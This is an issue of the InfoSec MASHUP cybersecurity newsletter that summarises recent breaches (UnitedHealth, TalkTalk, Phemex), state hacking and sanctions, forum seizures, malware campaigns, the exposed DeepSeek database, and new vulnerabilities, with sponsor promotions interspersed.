[InfoSec MASHUP] 05/2025
Wiz Research Uncovers Exposed DeepSeek Database; Public Transport Hit in Tbilisi (Georgia); UnitedHealth Breach Affected 190 million Americans; EU Sanctions GRU Hackers; Authorities Seize more Forums;
Welcome to the 28 new members from the last 30 days! This newsletter now has 1,653 subscribers.
Partners and Affiliates
🔐 NordVPN Birthday Campaign 🎉 (February 5 – March 19)
Special Birthday Offer: up to 73% off on 2-year plans + 6 months free purchasing Ultra, Ultimate, Complete, Plus, Standard plans.
Breaches & Security Incidents
PowerSchool begins notifying students and teachers after massive data breach
🇮🇳 Tata Technologies has reported a ransomware attack that affected some of its IT assets but did not disrupt client services. The company is investigating the incident with experts to understand the cause and take necessary actions. Details about the attack, such as the identity of the attackers or any ransom payment, have not been disclosed.
🇬🇪 On January 24, 2025, public transport in Tbilisi, Georgia, was hit by a cyberattack targeting the ticket payment systems. Hackers took control of ticket machines in buses and mini-buses, causing them to play a series of pro-European and patriotic audio messages.
🇬🇧 Smiths Group, a major engineering company, reported a security breach after attackers accessed its systems. The company is investigating the incident, isolating affected systems, and working with cyber security experts. They have not yet disclosed if any customer data was stolen.
🇬🇧 TalkTalk has confirmed a data breach involving a third-party platform, with a hacker claiming to sell the data of over 18.8 million customers. The company is investigating the incident and working with the supplier, but they believe the number of affected customers is overstated. Compromised login credentials may have been used to access the data, but the exact impact remains unclear. TalkTalk previously suffered a significant data breach back in 2015.
🇸🇬 Hackers stole over $85 million worth of cryptocurrency from the Phemex exchange during a security breach. Phemex has since suspended deposits and withdrawals while enhancing their security measures. The identity of the hackers remains unknown, but North Korean groups are often linked to such large-scale crypto thefts.
🇺🇸 UnitedHealth has announced that a ransomware attack on its subsidiary, Change Healthcare, affected 190 million Americans, nearly doubling the initial estimate of 100 million. The stolen data includes sensitive personal and healthcare information, making it the largest healthcare data breach in U.S. history. The attack caused significant disruptions in the healthcare system and resulted in substantial financial losses for UnitedHealth.
🇺🇸 PayPal will pay $2 million to settle claims of failing to follow New York's cybersecurity rules, which led to a data breach in 2022. Cybercriminals accessed sensitive customer information from 35,000 accounts due to security gaps and lack of multi-factor authentication. After the breach, PayPal took steps to improve security but was still held accountable for the initial failures.
➝ More breaches:
ENGlobal Says Personal Information Accessed in Ransomware Attack
Globe Life data breach may impact an additional 850,000 clients
Mizuno USA Says Hackers Stayed in its Network for Two Months
🔊 Interested in Reaching a Cybersecurity Audience?
Amplify your brand’s presence by sponsoring the InfoSec MASHUP newsletter!
Reach dedicated readers in the cybersecurity field with each issue! Contact us to explore sponsorship opportunities.
Cybercrime, Cyber Espionage, APT’s
KuCoin to Pay nearly $300 million in Penalties after Guilty Plea
👀 💬 WhatsApp disrupted a hacking campaign targeting around 90 users, including journalists, linked to the Israeli spyware maker Paragon. The campaign used malicious PDFs sent via WhatsApp groups, and WhatsApp has contacted those affected. This incident raises concerns about the accountability of spyware companies in their actions.
🇺🇸 🇳🇱 U.S. and Dutch authorities have dismantled the HeartSender cybercrime network, which was based in Pakistan and sold phishing kits. The operation seized 39 domains and servers, linked to over $3 million in victim losses. This network attracted thousands of customers by offering tools for sending phishing emails and stealing credentials.
🇺🇸 The FBI, along with international law enforcement, has taken control of several major cybercrime forums, including Cracked[.]io and Nulled[.]to. These sites were known for selling stolen credentials and hacking tools, but now they redirect to FBI servers. This operation is part of a broader effort to disrupt online marketplaces that support cybercriminal activities.
🇷🇺 🇪🇺 UAC-0063: Cyber Espionage Operation Expanding from Central Asia — The group has expanded its cyber attacks to European embassies using stolen documents to deliver malware called HATVIBE. Initially focused on Central Asia, they are now targeting countries like Germany, the UK, and Romania. This group is linked to Russian state-sponsored activities and employs various malware to conduct espionage against government entities.
🇪🇺 🇷🇺 The European Union has sanctioned three Russian hackers from the GRU for cyberattacks against Estonia in 2020. They stole thousands of sensitive documents from Estonian government agencies, compromising critical information. This group has also been linked to attacks on other countries and has faced previous sanctions for destabilizing activities in Europe.
Government, Politics, and Privacy
🇺🇸 A bipartisan bill introduced by Reps. Zach Nunn and Josh Gottheimer aims to improve coordination between the government and financial institutions to combat rising ransomware attacks. The bill requires the Treasury secretary to report on current cybersecurity practices and how to enhance them. Ransomware attacks have surged, costing institutions millions, highlighting the need for a stronger response strategy.
🇺🇸 Last week, President Trump made significant changes to federal cybersecurity efforts by firing advisors from the Cyber Safety Review Board and revoking a Biden order aimed at managing AI risks. He also created a new focus on cryptocurrency regulation while criticizing previous government actions on free speech and disinformation. These moves could impact cybersecurity, privacy, and civil liberties in the United States. The Trump administration has paused federal cybersecurity grants, creating uncertainty for state governments, businesses, and foreign allies. This freeze follows a recent memo that halts federal financial assistance, leaving many programs in doubt. Experts worry this chaos could hinder efforts to strengthen cybersecurity just as threats are evolving.
Partners and Affiliates
🌐 Stay connected and secure on the go with Airalo's global eSIMs — Use the code NEWTOAIRALO15 if you’re new to Airalo to get an additional 15% discount.
Malware & Threats
🇺🇸 🇨🇳 The US Cybersecurity and Infrastructure Security Agency (CISA) has discovered a backdoor in Contec CMS8000 healthcare patient monitors that sends patient data to a remote IP address linked to a Chinese university. This backdoor allows remote access to the devices, enabling unauthorized control and data transmission without logging the activity. CISA advises healthcare organizations to disconnect these devices from their networks and check for signs of tampering, as no patch currently exists to fix the issue.
🦠 Trend Micro's Managed XDR team found that Lumma Stealer, an information-stealing malware, was distributed through GitHub by attackers who exploited its release infrastructure. The malware not only exfiltrated sensitive data but also downloaded additional malicious tools like SectopRAT and Vidar. This campaign shares tactics with the Stargazer Goblin group, using compromised websites to redirect users to malicious GitHub links.
🦠 🧩 Hackers are targeting outdated WordPress sites to spread malware that steals personal information from Windows and Mac users. They trick visitors into downloading malicious files by displaying fake Chrome update pages. Over 10,000 websites have been compromised in this ongoing attack, which is aimed at a wide audience rather than specific individuals.
🦠 📱 A new malware called Aquabot is targeting vulnerable Mitel SIP phones to create a botnet for DDoS attacks. It exploits a serious vulnerability in specific Mitel phone models, allowing attackers to execute harmful commands. Mitel has released firmware updates to fix this flaw, but the malware is also targeting other devices and vulnerabilities.
AI, Crypto, Tech & Tools
🔓 🤖 Wiz Research found a publicly accessible database belonging to the Chinese AI startup DeepSeek, exposing over a million lines of sensitive data, including chat history and secret keys. This security flaw allowed full control over the database without any authentication, posing significant risks to DeepSeek and its users. The incident highlights the urgent need for better security practices as AI technology rapidly evolves and is widely adopted.
🇨🇳 💥 DeepSeek, a Chinese AI startup, has paused new user registrations due to "large-scale malicious attacks" on its services. Despite these issues, existing users can still log in, and the company’s open-source AI model, R1, is gaining significant attention in the U.S. tech market. The success of R1 raises concerns for American companies about integrating a Chinese-made AI, especially regarding data privacy and potential biases in its responses.
🤖 💥 The Google Threat Intelligence Group analyzed how government-backed threat actors misused their AI assistant, Gemini, for malicious activities. They found that these actors used Gemini for tasks such as coding, vulnerability research, and content generation to support their cyberattacks. The report highlights the need for responsible AI use and ongoing efforts to counter these threats.
What’s going on with (Sem|open)grep? — by Josh Grossman
🛠️ A group of over 10 security companies has created a new open-source tool called Opengrep after dissatisfaction with changes to the licensing policy of the popular tool Semgrep. The changes made it harder for users to share community-created improvements, prompting these companies to unite and focus on maintaining open-source principles. Opengrep aims to provide accessible security testing features while ensuring community involvement in its development.
Partners and Affiliates
⚡️ Unlock Your Peak Performance – First Month FREE!
Optimize your sleep, recovery, and performance with WHOOP. Perfect for cybersecurity pros who need to stay focused and ahead. Try it out, get a free WHOOP 4.0 and one month free.
Vulnerabilities, Research, and Threat Intelligence
Broadcom Warns of High-Severity SQL Injection Flaw in VMware Avi Load Balancer (CVE-2025-22217)
Critical Cacti Security Flaw (CVE-2025-22604) Enables Remote Code Execution
VMware Patches High-Risk Flaws in Oft-Targeted Aria Operations Products
Zyxel CPE Devices Face Active Exploitation Due to Unpatched CVE-2024-40891 Vulnerability
🇺🇸 🧪 DARPA is developing a new project called Red-C to create "self-healing" firmware that can automatically respond to and recover from cyberattacks like ransomware. This firmware will enable computer systems to monitor for threats and restore data without needing external help. The goal is to enhance cybersecurity by building defenses directly into the firmware of bus-based systems used in various devices.
💥 SonicWall has confirmed that a critical vulnerability in its Secure Mobile Access (SMA) 1000 series has been exploited, allowing remote command execution without authentication. The company has released a patch and urged customers to update their firmware immediately to protect against attacks. Federal agencies have been instructed to address this flaw by February 14, as it is part of the Known Exploited Vulnerabilities catalog.
🪳 🍎 Researchers have discovered two new attacks, SLAP and FLOP, that target Apple’s M-series chips, allowing hackers to potentially leak sensitive information from browsers like Safari and Chrome. SLAP exploits the Load Address Predictor, while FLOP takes advantage of the Load Value Predictor, both causing the CPU to mispredict data addresses and execute harmful instructions. These vulnerabilities could expose users' private data, including emails and credit card information.
🩹 🍎 Apple has released updates to fix a serious security flaw that was actively exploited in iPhones, Macs, and other devices. This vulnerability, known as CVE-2025-24085, allows malicious apps to gain higher privileges on affected devices. Users are urged to install the patches to protect themselves from potential threats.
🪳 🔓 Multiple security vulnerabilities in GitHub Desktop and related projects can allow attackers to access users' Git credentials. These flaws can be exploited through malicious URLs, leading to credential leakage. Users are urged to update to the latest version to protect against these risks.
ICS, OT & IoT
🪳 📡 Research has found 119 vulnerabilities in LTE and 5G networks that could disrupt cellular service in entire cities. Attackers could exploit these flaws using small data packets, causing widespread communication failures. Some vulnerabilities can be accessed by any device, even those without SIM cards, making these attacks easier to carry out.